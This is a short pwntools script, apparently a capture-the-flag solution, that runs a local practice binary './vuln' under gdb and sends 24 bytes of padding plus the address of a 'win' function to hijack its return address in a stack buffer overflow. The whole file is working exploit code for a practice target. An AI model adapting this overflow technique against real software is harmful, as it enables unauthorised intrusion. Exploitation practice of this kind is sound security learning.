from pwn import *

io = process("./vuln")
elf = ELF("./vuln")

print(io.recvuntil(b"Enter your name: "))

gdb.attach(io, """
    break main
""")
context.terminal = ["tmux", "splitw", "-h"]
# *************** EXPLOIT PART *************** #
payload = b""
padding = b"A" * 24
win = p64(elf.sym["win"])

payload = padding + win


# *************** EXPLOIT END *************** #

io.sendline(payload)

io.interactive()
